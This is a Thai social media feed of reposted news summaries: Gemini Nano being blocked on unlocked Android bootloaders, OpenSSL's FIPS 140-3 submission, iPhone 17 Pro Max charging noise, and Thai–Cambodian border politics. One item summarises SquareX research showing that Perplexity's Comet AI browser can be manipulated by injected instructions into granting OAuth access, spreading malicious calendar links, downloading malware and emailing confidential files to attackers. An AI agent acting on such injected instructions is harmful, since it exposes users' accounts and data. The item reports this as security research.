เพื่อปรับแต่งระบบ แนวโน้มนี้สะท้อนถึงการเปลี่ยนแปลงของระบบ Android ที่เคยเปิดกว้างสำหรับนักพัฒนาและผู้ใช้ขั้นสูง แต่กำลังถูกจำกัดมากขึ้น โดยผู้ผลิตหลายรายเริ่มปิดกั้นการปลดล็อก bootloader หรือจำกัดให้ทำได้เพียงเครื่องเดียวต่อบัญชี แม้จะเป็นการตัดสินใจที่มีเหตุผลด้านความปลอดภัย แต่ก็สร้างความไม่พอใจให้กับผู้ใช้บางกลุ่มที่เคยใช้ฟีเจอร์ AI บนเครื่องอย่างเต็มประสิทธิภาพ ✅ ข้อมูลสำคัญจากข่าว ➡️ Google ประกาศว่าอุปกรณ์ที่ปลดล็อก bootloader จะไม่สามารถใช้ Gemini Nano ได้ ➡️ Gemini Nano เป็นโมเดล AI ขนาดเล็กที่ทำงานบนอุปกรณ์โดยตรง ➡️ การปลดล็อก bootloader ทำให้ระบบถือว่าอุปกรณ์ไม่ปลอดภัย ➡️ API ของ Gemini Nano จะแสดงข้อความ “FEATURE_NOT_FOUND” บนเครื่องที่ปลดล็อก ➡️ การเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่องไม่สามารถแก้ไขปัญหาได้ ➡️ ผู้ใช้ที่ root เครื่องหรือใช้ custom ROM จะไม่สามารถใช้ฟีเจอร์ AI บนเครื่องได้ ➡️ ผู้ผลิตหลายรายเริ่มจำกัดการปลดล็อก bootloader หรือยกเลิกฟีเจอร์นี้ไปเลย ✅ ข้อมูลเสริมจากภายนอก ➡️ Gemini Nano ใช้ในฟีเจอร์อย่าง smart reply, audio summarization และ image description ➡️ ML Kit API เป็นเครื่องมือสำหรับนักพัฒนาในการเรียกใช้ฟีเจอร์ AI บนอุปกรณ์ Android ➡️ การปลดล็อก bootloader เป็นวิธีที่ใช้ในการติดตั้ง ROM แบบกำหนดเองหรือ root เครื่อง ➡️ Android 16 เริ่มไม่เผยแพร่ device tree และ driver binaries ทำให้การพัฒนา custom ROM ยากขึ้น ➡️ การจำกัด bootloader เป็นแนวทางที่ผู้ผลิตใช้เพื่อป้องกันการโจมตีและการ debug ที่ไม่พึงประสงค์ https://securityonline.info/gemini-nano-block-google-locks-on-device-ai-access-for-smartphones-with-unlocked-bootloaders/
    SECURITYONLINE.INFO
    Gemini Nano Block: Google Locks On-Device AI Access for Smartphones with Unlocked Bootloaders
    Google has confirmed that the Gemini Nano on-device AI model is blocked from running on Android devices with an unlocked bootloader, citing a feature not found error.
    0 Comments 0 Shares 4 Views 0 Reviews
  • “SquareX เตือนภัยเบราว์เซอร์ AI — Comet ถูกหลอกให้ส่งมัลแวร์, แชร์ไฟล์ลับ และเปิดช่อง OAuth โดยไม่รู้ตัว”

    ในวันที่เบราว์เซอร์ AI กำลังกลายเป็นเครื่องมือหลักของผู้ใช้ทั่วโลก SquareX ได้เปิดเผยงานวิจัยด้านความปลอดภัยที่ชี้ให้เห็นช่องโหว่ร้ายแรงในเบราว์เซอร์ AI โดยเฉพาะ Comet ซึ่งเป็นเบราว์เซอร์จาก Perplexity ที่มีความสามารถในการทำงานแทนผู้ใช้แบบอัตโนมัติ

    SquareX พบว่า Comet สามารถถูกโจมตีผ่านหลายวิธี เช่น:

    การโจมตีแบบ OAuth ที่ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive ของเหยื่อได้ทั้งหมด
    การฝังลิงก์อันตรายในคำเชิญปฏิทินที่ส่งไปยังเพื่อนร่วมงานของเหยื่อ
    การหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ที่จำเป็นต่อ workflow
    การส่งไฟล์ลับไปยังผู้โจมตีผ่านอีเมลโดยไม่ตั้งใจ

    ปัญหาหลักคือ AI Browser อย่าง Comet ไม่สามารถแยกแยะได้ว่าอะไรคือคำสั่งที่ปลอดภัย และอะไรคือคำสั่งที่ถูกแฮกเกอร์แทรกเข้ามาใน workflow โดยเฉพาะเมื่อเบราว์เซอร์มีสิทธิ์เท่ากับผู้ใช้ และทำงานแทนผู้ใช้โดยอัตโนมัติ

    SquareX ระบุว่าโซลูชันด้านความปลอดภัยแบบเดิม เช่น EDR หรือ SASE/SSE ไม่สามารถตรวจจับพฤติกรรมของ AI Browser ได้อย่างแม่นยำ เพราะไม่สามารถแยกแยะได้ว่าการกระทำมาจากผู้ใช้จริงหรือจาก AI agent

    Stephen Bennett, CISO ของ Domino’s Pizza Enterprises กล่าวเสริมว่า “เบราว์เซอร์เคยเป็นหน้าต่างของผู้ใช้ แต่ AI Browser กำลังเปลี่ยนให้ผู้ใช้กลายเป็นผู้โดยสาร” ซึ่งสะท้อนถึงความเสี่ยงที่ผู้ใช้อาจไม่สามารถควบคุมการทำงานของเบราว์เซอร์ได้อีกต่อไป

    SquareX เสนอให้มีการพัฒนาโซลูชันแบบ browser-native ที่สามารถแยกแยะตัวตนของ AI agent กับผู้ใช้จริง และกำหนดขอบเขตการเข้าถึงข้อมูลและการกระทำได้อย่างชัดเจน

    ข้อมูลสำคัญจากข่าว
    SquareX เปิดเผยช่องโหว่ในเบราว์เซอร์ AI โดยเฉพาะ Comet จาก Perplexity
    Comet ถูกโจมตีผ่าน OAuth ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive
    ถูกหลอกให้ฝังลิงก์อันตรายในคำเชิญปฏิทิน
    ถูกหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ workflow
    ส่งไฟล์ลับไปยังผู้โจมตีโดยไม่ตั้งใจ
    AI Browser ทำงานแทนผู้ใช้โดยมีสิทธิ์เท่ากัน ทำให้ถูกหลอกได้ง่าย
    โซลูชัน EDR/SASE ไม่สามารถแยกแยะพฤติกรรมของ AI agent ได้
    SquareX เสนอให้มีระบบ browser-native ที่แยกแยะตัวตนและควบคุมการเข้าถึง

    ข้อมูลเสริมจากภายนอก
    Comet เป็นเบราว์เซอร์ AI ที่สามารถทำงานใน inbox, ปฏิทิน และระบบ cloud
    OAuth เป็นโปรโตคอลที่ใช้ในการให้สิทธิ์เข้าถึงข้อมูล โดยไม่ต้องใช้รหัสผ่าน
    Prompt injection คือการแทรกคำสั่งอันตรายเข้าไปใน workflow ของ AI
    AI Browser กำลังถูกนำมาใช้ในองค์กรเพื่อเพิ่ม productivity
    SquareX มีระบบ Browser Detection and Response (BDR) ที่ช่วยป้องกันภัยจากเบราว์เซอร์

    https://securityonline.info/squarex-shows-ai-browsers-fall-prey-to-oauth-attacks-malware-downloads-and-malicious-link-distribution/
    🕷️ “SquareX เตือนภัยเบราว์เซอร์ AI — Comet ถูกหลอกให้ส่งมัลแวร์, แชร์ไฟล์ลับ และเปิดช่อง OAuth โดยไม่รู้ตัว” ในวันที่เบราว์เซอร์ AI กำลังกลายเป็นเครื่องมือหลักของผู้ใช้ทั่วโลก SquareX ได้เปิดเผยงานวิจัยด้านความปลอดภัยที่ชี้ให้เห็นช่องโหว่ร้ายแรงในเบราว์เซอร์ AI โดยเฉพาะ Comet ซึ่งเป็นเบราว์เซอร์จาก Perplexity ที่มีความสามารถในการทำงานแทนผู้ใช้แบบอัตโนมัติ SquareX พบว่า Comet สามารถถูกโจมตีผ่านหลายวิธี เช่น: 🐛 การโจมตีแบบ OAuth ที่ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive ของเหยื่อได้ทั้งหมด 🐛 การฝังลิงก์อันตรายในคำเชิญปฏิทินที่ส่งไปยังเพื่อนร่วมงานของเหยื่อ 🐛 การหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ที่จำเป็นต่อ workflow 🐛 การส่งไฟล์ลับไปยังผู้โจมตีผ่านอีเมลโดยไม่ตั้งใจ ปัญหาหลักคือ AI Browser อย่าง Comet ไม่สามารถแยกแยะได้ว่าอะไรคือคำสั่งที่ปลอดภัย และอะไรคือคำสั่งที่ถูกแฮกเกอร์แทรกเข้ามาใน workflow โดยเฉพาะเมื่อเบราว์เซอร์มีสิทธิ์เท่ากับผู้ใช้ และทำงานแทนผู้ใช้โดยอัตโนมัติ SquareX ระบุว่าโซลูชันด้านความปลอดภัยแบบเดิม เช่น EDR หรือ SASE/SSE ไม่สามารถตรวจจับพฤติกรรมของ AI Browser ได้อย่างแม่นยำ เพราะไม่สามารถแยกแยะได้ว่าการกระทำมาจากผู้ใช้จริงหรือจาก AI agent Stephen Bennett, CISO ของ Domino’s Pizza Enterprises กล่าวเสริมว่า “เบราว์เซอร์เคยเป็นหน้าต่างของผู้ใช้ แต่ AI Browser กำลังเปลี่ยนให้ผู้ใช้กลายเป็นผู้โดยสาร” ซึ่งสะท้อนถึงความเสี่ยงที่ผู้ใช้อาจไม่สามารถควบคุมการทำงานของเบราว์เซอร์ได้อีกต่อไป SquareX เสนอให้มีการพัฒนาโซลูชันแบบ browser-native ที่สามารถแยกแยะตัวตนของ AI agent กับผู้ใช้จริง และกำหนดขอบเขตการเข้าถึงข้อมูลและการกระทำได้อย่างชัดเจน ✅ ข้อมูลสำคัญจากข่าว ➡️ SquareX เปิดเผยช่องโหว่ในเบราว์เซอร์ AI โดยเฉพาะ Comet จาก Perplexity ➡️ Comet ถูกโจมตีผ่าน OAuth ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive ➡️ ถูกหลอกให้ฝังลิงก์อันตรายในคำเชิญปฏิทิน ➡️ ถูกหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ workflow ➡️ ส่งไฟล์ลับไปยังผู้โจมตีโดยไม่ตั้งใจ ➡️ AI Browser ทำงานแทนผู้ใช้โดยมีสิทธิ์เท่ากัน ทำให้ถูกหลอกได้ง่าย ➡️ โซลูชัน EDR/SASE ไม่สามารถแยกแยะพฤติกรรมของ AI agent ได้ ➡️ SquareX เสนอให้มีระบบ browser-native ที่แยกแยะตัวตนและควบคุมการเข้าถึง ✅ ข้อมูลเสริมจากภายนอก ➡️ Comet เป็นเบราว์เซอร์ AI ที่สามารถทำงานใน inbox, ปฏิทิน และระบบ cloud ➡️ OAuth เป็นโปรโตคอลที่ใช้ในการให้สิทธิ์เข้าถึงข้อมูล โดยไม่ต้องใช้รหัสผ่าน ➡️ Prompt injection คือการแทรกคำสั่งอันตรายเข้าไปใน workflow ของ AI ➡️ AI Browser กำลังถูกนำมาใช้ในองค์กรเพื่อเพิ่ม productivity ➡️ SquareX มีระบบ Browser Detection and Response (BDR) ที่ช่วยป้องกันภัยจากเบราว์เซอร์ https://securityonline.info/squarex-shows-ai-browsers-fall-prey-to-oauth-attacks-malware-downloads-and-malicious-link-distribution/
    0 Comments 0 Shares 5 Views 0 Reviews
  • “OpenSSL 3.5.4 เตรียมผ่านมาตรฐาน FIPS 140-3 — พร้อมรับมือยุคควอนตัมด้วยโมดูลเข้ารหัสแบบเปิด”

    Lightship Security ร่วมกับ OpenSSL Corporation ได้ประกาศการส่ง OpenSSL เวอร์ชัน 3.5.4 เข้าสู่กระบวนการรับรองมาตรฐาน FIPS 140-3 โดย Cryptographic Module Validation Program (CMVP) ซึ่งเป็นขั้นตอนสุดท้ายก่อนการออกใบรับรองอย่างเป็นทางการจาก NIST

    การส่งครั้งนี้ยืนยันว่าโค้ดของโมดูลเข้ารหัสได้ผ่านการทดสอบจากห้องแล็บอิสระและผ่านเกณฑ์ของ NIST แล้วทั้งหมด โดย OpenSSL 3.5.4 ถือเป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3 ซึ่งจะช่วยให้องค์กรภาครัฐและเอกชนสามารถนำไปใช้งานได้อย่างมั่นใจในด้านความปลอดภัยและการปฏิบัติตามข้อกำหนด

    OpenSSL 3.5 ซึ่งเปิดตัวเมื่อเดือนเมษายน 2025 ได้เพิ่มการรองรับอัลกอริธึมเข้ารหัสแบบ post-quantum เช่น ML-KEM, ML-DSA และ SLH-DSA ตามแนวทางการมาตรฐานของ NIST เพื่อเตรียมความพร้อมสำหรับยุคที่คอมพิวเตอร์ควอนตัมอาจทำลายระบบเข้ารหัสแบบเดิม

    Jason Lawlor ประธานของ Lightship Security กล่าวว่า “นี่คือก้าวสำคัญในการรักษาความปลอดภัยแบบมาตรฐานในหนึ่งในไลบรารีโอเพ่นซอร์สที่ใช้กันแพร่หลายที่สุดในโลก” ขณะที่ Tim Hudson จาก OpenSSL Corporation ย้ำว่า “โมดูลนี้พร้อมใช้งานแล้ว แม้ใบรับรองจะยังไม่ออกก็ตาม”

    การร่วมมือครั้งนี้ยังสานต่อประวัติศาสตร์ของ OpenSSL ในการพัฒนาโมดูลที่ได้รับการรับรอง FIPS ซึ่งถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์ทั่วโลก

    ข้อมูลสำคัญจากข่าว
    OpenSSL 3.5.4 ถูกส่งเข้าสู่กระบวนการรับรอง FIPS 140-3 โดย CMVP
    โมดูลผ่านการทดสอบจาก NIST และห้องแล็บอิสระเรียบร้อยแล้ว
    เป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3
    OpenSSL 3.5 รองรับอัลกอริธึม post-quantum เช่น ML-KEM, ML-DSA, SLH-DSA
    โมดูลนี้ถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์
    Jason Lawlor และ Tim Hudson ยืนยันว่าโมดูลพร้อมใช้งานแล้ว
    การรับรองจะช่วยให้องค์กรสามารถใช้งานได้อย่างมั่นใจในด้าน compliance

    ข้อมูลเสริมจากภายนอก
    FIPS 140-3 เป็นมาตรฐานความปลอดภัยสำหรับโมดูลเข้ารหัสที่ใช้ในภาครัฐสหรัฐฯ
    Post-quantum cryptography คือการเข้ารหัสที่ทนต่อการโจมตีจากคอมพิวเตอร์ควอนตัม
    ML-KEM และ ML-DSA เป็นอัลกอริธึมที่ได้รับการเสนอโดย NIST สำหรับการใช้งานในอนาคต
    OpenSSL เป็นไลบรารีเข้ารหัสที่ใช้ในระบบอินเทอร์เน็ตและ embedded systems ทั่วโลก
    การรับรอง FIPS ช่วยให้องค์กรสามารถผ่านข้อกำหนดด้านความปลอดภัยของหลายประเทศ

    https://securityonline.info/lightship-security-and-the-openssl-corporation-submit-openssl-3-5-4-for-fips-140-3-validation/
    🔐 “OpenSSL 3.5.4 เตรียมผ่านมาตรฐาน FIPS 140-3 — พร้อมรับมือยุคควอนตัมด้วยโมดูลเข้ารหัสแบบเปิด” Lightship Security ร่วมกับ OpenSSL Corporation ได้ประกาศการส่ง OpenSSL เวอร์ชัน 3.5.4 เข้าสู่กระบวนการรับรองมาตรฐาน FIPS 140-3 โดย Cryptographic Module Validation Program (CMVP) ซึ่งเป็นขั้นตอนสุดท้ายก่อนการออกใบรับรองอย่างเป็นทางการจาก NIST การส่งครั้งนี้ยืนยันว่าโค้ดของโมดูลเข้ารหัสได้ผ่านการทดสอบจากห้องแล็บอิสระและผ่านเกณฑ์ของ NIST แล้วทั้งหมด โดย OpenSSL 3.5.4 ถือเป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3 ซึ่งจะช่วยให้องค์กรภาครัฐและเอกชนสามารถนำไปใช้งานได้อย่างมั่นใจในด้านความปลอดภัยและการปฏิบัติตามข้อกำหนด OpenSSL 3.5 ซึ่งเปิดตัวเมื่อเดือนเมษายน 2025 ได้เพิ่มการรองรับอัลกอริธึมเข้ารหัสแบบ post-quantum เช่น ML-KEM, ML-DSA และ SLH-DSA ตามแนวทางการมาตรฐานของ NIST เพื่อเตรียมความพร้อมสำหรับยุคที่คอมพิวเตอร์ควอนตัมอาจทำลายระบบเข้ารหัสแบบเดิม Jason Lawlor ประธานของ Lightship Security กล่าวว่า “นี่คือก้าวสำคัญในการรักษาความปลอดภัยแบบมาตรฐานในหนึ่งในไลบรารีโอเพ่นซอร์สที่ใช้กันแพร่หลายที่สุดในโลก” ขณะที่ Tim Hudson จาก OpenSSL Corporation ย้ำว่า “โมดูลนี้พร้อมใช้งานแล้ว แม้ใบรับรองจะยังไม่ออกก็ตาม” การร่วมมือครั้งนี้ยังสานต่อประวัติศาสตร์ของ OpenSSL ในการพัฒนาโมดูลที่ได้รับการรับรอง FIPS ซึ่งถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์ทั่วโลก ✅ ข้อมูลสำคัญจากข่าว ➡️ OpenSSL 3.5.4 ถูกส่งเข้าสู่กระบวนการรับรอง FIPS 140-3 โดย CMVP ➡️ โมดูลผ่านการทดสอบจาก NIST และห้องแล็บอิสระเรียบร้อยแล้ว ➡️ เป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3 ➡️ OpenSSL 3.5 รองรับอัลกอริธึม post-quantum เช่น ML-KEM, ML-DSA, SLH-DSA ➡️ โมดูลนี้ถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์ ➡️ Jason Lawlor และ Tim Hudson ยืนยันว่าโมดูลพร้อมใช้งานแล้ว ➡️ การรับรองจะช่วยให้องค์กรสามารถใช้งานได้อย่างมั่นใจในด้าน compliance ✅ ข้อมูลเสริมจากภายนอก ➡️ FIPS 140-3 เป็นมาตรฐานความปลอดภัยสำหรับโมดูลเข้ารหัสที่ใช้ในภาครัฐสหรัฐฯ ➡️ Post-quantum cryptography คือการเข้ารหัสที่ทนต่อการโจมตีจากคอมพิวเตอร์ควอนตัม ➡️ ML-KEM และ ML-DSA เป็นอัลกอริธึมที่ได้รับการเสนอโดย NIST สำหรับการใช้งานในอนาคต ➡️ OpenSSL เป็นไลบรารีเข้ารหัสที่ใช้ในระบบอินเทอร์เน็ตและ embedded systems ทั่วโลก ➡️ การรับรอง FIPS ช่วยให้องค์กรสามารถผ่านข้อกำหนดด้านความปลอดภัยของหลายประเทศ https://securityonline.info/lightship-security-and-the-openssl-corporation-submit-openssl-3-5-4-for-fips-140-3-validation/
    0 Comments 0 Shares 4 Views 0 Reviews
  • “iPhone 17 Pro Max เจอปัญหาเสียงรบกวนขณะชาร์จผ่าน USB-C — เสียงซ่าเบา ๆ แม้ปิดเสียง อาจเป็นบั๊กซอฟต์แวร์หรือฮาร์ดแวร์?”

    หลังจากเปิดตัว iPhone 17 Pro Max ได้ไม่นาน ผู้ใช้จำนวนหนึ่งเริ่มรายงานปัญหาเสียงรบกวนจากลำโพงขณะชาร์จผ่านสาย USB-C โดยเสียงที่ได้ยินคล้ายคลื่นวิทยุหรือเสียงซ่าจากวิทยุเก่า ซึ่งเกิดขึ้นแม้จะตั้งค่าเสียงไว้ที่ระดับศูนย์ และไม่มีการเล่นเสียงใด ๆ

    เสียงรบกวนนี้มักเกิดจากลำโพงด้านล่างซ้ายของเครื่อง โดยจะได้ยินชัดเจนเมื่อเอาหูแนบใกล้ลำโพงขณะชาร์จผ่านสาย และจะหายไปทันทีเมื่อถอดสายชาร์จหรือใช้การชาร์จแบบไร้สายผ่าน MagSafe ซึ่งมีแนวโน้มจะเกิดเสียงน้อยกว่า

    ผู้ใช้บางรายพบว่าเสียงจะดังขึ้นเมื่อแบตเตอรี่ใกล้เต็ม หรือเมื่อมีการเลื่อนหน้าจอขณะชาร์จ ซึ่งอาจเกี่ยวข้องกับการทำงานของระบบ UI และการจัดการพลังงานในระดับฮาร์ดแวร์

    แม้จะมีการเปลี่ยนเครื่องใหม่ แต่หลายคนยังพบปัญหาเดิม ทำให้เกิดข้อสงสัยว่าอาจเป็นปัญหาในระดับการออกแบบหรือซอฟต์แวร์ของ iOS 26 โดย Genius Bar ของ Apple ยังไม่พบความผิดปกติในฮาร์ดแวร์ และแนะนำให้ส่งเสียงที่บันทึกไว้พร้อมภาพประกอบเพื่อให้ทีมวิศวกรตรวจสอบ

    Apple ยังไม่ออกแถลงการณ์อย่างเป็นทางการเกี่ยวกับปัญหานี้ และยังไม่มีการปล่อยอัปเดตซอฟต์แวร์เพื่อแก้ไข แม้บางคนจะลองใช้ iOS 26.1 beta แล้วพบว่าเสียงยังคงอยู่

    ข้อมูลสำคัญจากข่าว
    ผู้ใช้ iPhone 17 Pro Max รายงานเสียงซ่าจากลำโพงขณะชาร์จผ่านสาย USB-C
    เสียงเกิดแม้ตั้งค่าเสียงเป็น 0 และไม่มีการเล่นเสียง
    ลำโพงด้านล่างซ้ายเป็นจุดที่เสียงรบกวนเกิดบ่อยที่สุด
    เสียงจะหายไปเมื่อถอดสายหรือใช้ MagSafe แทน
    ปัญหาเกิดมากขึ้นเมื่อแบตเตอรี่ใกล้เต็มหรือมีการเลื่อนหน้าจอ
    การเปลี่ยนเครื่องใหม่ไม่ช่วยแก้ปัญหา
    Genius Bar ไม่พบความผิดปกติในฮาร์ดแวร์
    Apple ยังไม่ออกแถลงการณ์หรือปล่อยอัปเดตแก้ไข

    https://securityonline.info/iphone-17-pro-max-users-report-distorted-audio-and-static-noise-during-usb-c-charging/
    📱 “iPhone 17 Pro Max เจอปัญหาเสียงรบกวนขณะชาร์จผ่าน USB-C — เสียงซ่าเบา ๆ แม้ปิดเสียง อาจเป็นบั๊กซอฟต์แวร์หรือฮาร์ดแวร์?” หลังจากเปิดตัว iPhone 17 Pro Max ได้ไม่นาน ผู้ใช้จำนวนหนึ่งเริ่มรายงานปัญหาเสียงรบกวนจากลำโพงขณะชาร์จผ่านสาย USB-C โดยเสียงที่ได้ยินคล้ายคลื่นวิทยุหรือเสียงซ่าจากวิทยุเก่า ซึ่งเกิดขึ้นแม้จะตั้งค่าเสียงไว้ที่ระดับศูนย์ และไม่มีการเล่นเสียงใด ๆ เสียงรบกวนนี้มักเกิดจากลำโพงด้านล่างซ้ายของเครื่อง โดยจะได้ยินชัดเจนเมื่อเอาหูแนบใกล้ลำโพงขณะชาร์จผ่านสาย และจะหายไปทันทีเมื่อถอดสายชาร์จหรือใช้การชาร์จแบบไร้สายผ่าน MagSafe ซึ่งมีแนวโน้มจะเกิดเสียงน้อยกว่า ผู้ใช้บางรายพบว่าเสียงจะดังขึ้นเมื่อแบตเตอรี่ใกล้เต็ม หรือเมื่อมีการเลื่อนหน้าจอขณะชาร์จ ซึ่งอาจเกี่ยวข้องกับการทำงานของระบบ UI และการจัดการพลังงานในระดับฮาร์ดแวร์ แม้จะมีการเปลี่ยนเครื่องใหม่ แต่หลายคนยังพบปัญหาเดิม ทำให้เกิดข้อสงสัยว่าอาจเป็นปัญหาในระดับการออกแบบหรือซอฟต์แวร์ของ iOS 26 โดย Genius Bar ของ Apple ยังไม่พบความผิดปกติในฮาร์ดแวร์ และแนะนำให้ส่งเสียงที่บันทึกไว้พร้อมภาพประกอบเพื่อให้ทีมวิศวกรตรวจสอบ Apple ยังไม่ออกแถลงการณ์อย่างเป็นทางการเกี่ยวกับปัญหานี้ และยังไม่มีการปล่อยอัปเดตซอฟต์แวร์เพื่อแก้ไข แม้บางคนจะลองใช้ iOS 26.1 beta แล้วพบว่าเสียงยังคงอยู่ ✅ ข้อมูลสำคัญจากข่าว ➡️ ผู้ใช้ iPhone 17 Pro Max รายงานเสียงซ่าจากลำโพงขณะชาร์จผ่านสาย USB-C ➡️ เสียงเกิดแม้ตั้งค่าเสียงเป็น 0 และไม่มีการเล่นเสียง ➡️ ลำโพงด้านล่างซ้ายเป็นจุดที่เสียงรบกวนเกิดบ่อยที่สุด ➡️ เสียงจะหายไปเมื่อถอดสายหรือใช้ MagSafe แทน ➡️ ปัญหาเกิดมากขึ้นเมื่อแบตเตอรี่ใกล้เต็มหรือมีการเลื่อนหน้าจอ ➡️ การเปลี่ยนเครื่องใหม่ไม่ช่วยแก้ปัญหา ➡️ Genius Bar ไม่พบความผิดปกติในฮาร์ดแวร์ ➡️ Apple ยังไม่ออกแถลงการณ์หรือปล่อยอัปเดตแก้ไข https://securityonline.info/iphone-17-pro-max-users-report-distorted-audio-and-static-noise-during-usb-c-charging/
    SECURITYONLINE.INFO
    iPhone 17 Pro Max Users Report Distorted Audio and Static Noise During USB-C Charging
    Users are reporting faint static, distortion, and volume issues on the iPhone 17 Pro Max speakers. The static noise is most noticeable when the device is connected to a USB-C charger.
    0 Comments 0 Shares 6 Views 0 Reviews
  • ไม่ได้พูดเส้นตาย 10 ตุลา ต้องปกป้องอธิปไตย : [NEWS UPDATE]

    นายอนุทิน ชาญวีรกูล นายกรัฐมนตรีและรมว.มหาดไทย เผยกรณีเอกอัครราชทูตสาธารณรัฐประชาชนจีน ประจำกัมพูชา ประกาศพร้อมสนับสนุนกัมพูชาปกป้องอธิปไตย ทูตจีนที่ประจำอยู่ในประเทศไทย ก็สนับสนุนไทยเช่นกัน นี่เป็นสิ่งที่ดี เพราะทั้งไทยและกัมพูชาต่างมีประเทศอื่นที่มีความปรารถนาดี อยากเห็นสถานการณ์ไม่บานปลายรุนแรงมากกว่านี้ ส่วนกรณีที่ฝ่ายไทยระบุว่า หากวันที่ 10 ตุลาคม นี้ กัมพูชายังไม่ย้ายออกจากพื้นที่บ้านหนองจาน จังหวัดสระแก้ว จะเคลียร์พื้นที่ด้วยตัวเองนั้น เราต้องไม่ทำตามอำเภอใจ มีกฎหมายสากลรองรับอยู่ คำว่าเส้นตายไม่ได้หลุดออกมาจากรัฐบาล ตอนนี้สิ่งที่ให้ความสำคัญสูงสุดคือ ความปลอดภัยของประชาชนไทย และอธิปไตยรวมถึงศักดิ์ศรีของประเทศไทย

    -"คลิกเดียวส่งถึงบ้าน"ยอดพุ่ง

    -เร่งหาแนวทางตรึงค่าไฟ

    -พาไทยหลุดกับดักเศรษฐกิจ

    -ฉีก MOU ต้องรับผลเสีย
    ไม่ได้พูดเส้นตาย 10 ตุลา ต้องปกป้องอธิปไตย : [NEWS UPDATE] นายอนุทิน ชาญวีรกูล นายกรัฐมนตรีและรมว.มหาดไทย เผยกรณีเอกอัครราชทูตสาธารณรัฐประชาชนจีน ประจำกัมพูชา ประกาศพร้อมสนับสนุนกัมพูชาปกป้องอธิปไตย ทูตจีนที่ประจำอยู่ในประเทศไทย ก็สนับสนุนไทยเช่นกัน นี่เป็นสิ่งที่ดี เพราะทั้งไทยและกัมพูชาต่างมีประเทศอื่นที่มีความปรารถนาดี อยากเห็นสถานการณ์ไม่บานปลายรุนแรงมากกว่านี้ ส่วนกรณีที่ฝ่ายไทยระบุว่า หากวันที่ 10 ตุลาคม นี้ กัมพูชายังไม่ย้ายออกจากพื้นที่บ้านหนองจาน จังหวัดสระแก้ว จะเคลียร์พื้นที่ด้วยตัวเองนั้น เราต้องไม่ทำตามอำเภอใจ มีกฎหมายสากลรองรับอยู่ คำว่าเส้นตายไม่ได้หลุดออกมาจากรัฐบาล ตอนนี้สิ่งที่ให้ความสำคัญสูงสุดคือ ความปลอดภัยของประชาชนไทย และอธิปไตยรวมถึงศักดิ์ศรีของประเทศไทย -"คลิกเดียวส่งถึงบ้าน"ยอดพุ่ง -เร่งหาแนวทางตรึงค่าไฟ -พาไทยหลุดกับดักเศรษฐกิจ -ฉีก MOU ต้องรับผลเสีย
    Like
    1
    0 Comments 0 Shares 60 Views 0 0 Reviews
  • จะโชว์โง่ไปถึงไหน จัดฉากเผาลังเปล่าอ้างแบนสินค้าไทย หรือต่อให้มีสินค้าจริง ก็ไม่ต่างอะไรกับเผาเงินเรียลทิ้ง เพราะซื้อสินค้าไทยไปแล้วไม่ได้ขายออกกลับเผาโชว์โง่
    #คิงส์โพธิ์แดง
    จะโชว์โง่ไปถึงไหน จัดฉากเผาลังเปล่าอ้างแบนสินค้าไทย หรือต่อให้มีสินค้าจริง ก็ไม่ต่างอะไรกับเผาเงินเรียลทิ้ง เพราะซื้อสินค้าไทยไปแล้วไม่ได้ขายออกกลับเผาโชว์โง่ #คิงส์โพธิ์แดง
    0 Comments 0 Shares 14 Views 0 Reviews
  • พวกนักสังเกตการณ์เชื่อว่าสหรัฐฯมีเป้าหมายกีดกันจีน ให้อยู่วงนอกการประชุมอาเซียน ที่กำลังมาถึงในเดือนตุลาคม โดยใช้อิทธิพลในข้อตกลงสันติภาพระหว่างกัมพูชาและไทยเป็นตัวผลักดัน ตามรายงานของแคมโบเดียเดลี

    อ่านต่อ..https://news1live.com/detail/9680000096909

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    พวกนักสังเกตการณ์เชื่อว่าสหรัฐฯมีเป้าหมายกีดกันจีน ให้อยู่วงนอกการประชุมอาเซียน ที่กำลังมาถึงในเดือนตุลาคม โดยใช้อิทธิพลในข้อตกลงสันติภาพระหว่างกัมพูชาและไทยเป็นตัวผลักดัน ตามรายงานของแคมโบเดียเดลี อ่านต่อ..https://news1live.com/detail/9680000096909 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    Like
    1
    0 Comments 0 Shares 67 Views 0 Reviews
  • 'พรพรหม' สุดภูมิใจเผยภาพ Before-After 3 ปีผ่านมา จากกองขยะอ่อนนุช สู่ สวนป่า 60,000 ต้น กลายเป็นปอดใหญ่แห่งใหม่ของกรุงเทพฯ
    https://www.thai-tai.tv/news/21835/
    .
    #ไทยไท #สวนป่าอ่อนนุช #พื้นที่สีเขียว #ปอดกรุงเทพ #พลิกโฉม #สิ่งแวดล้อม
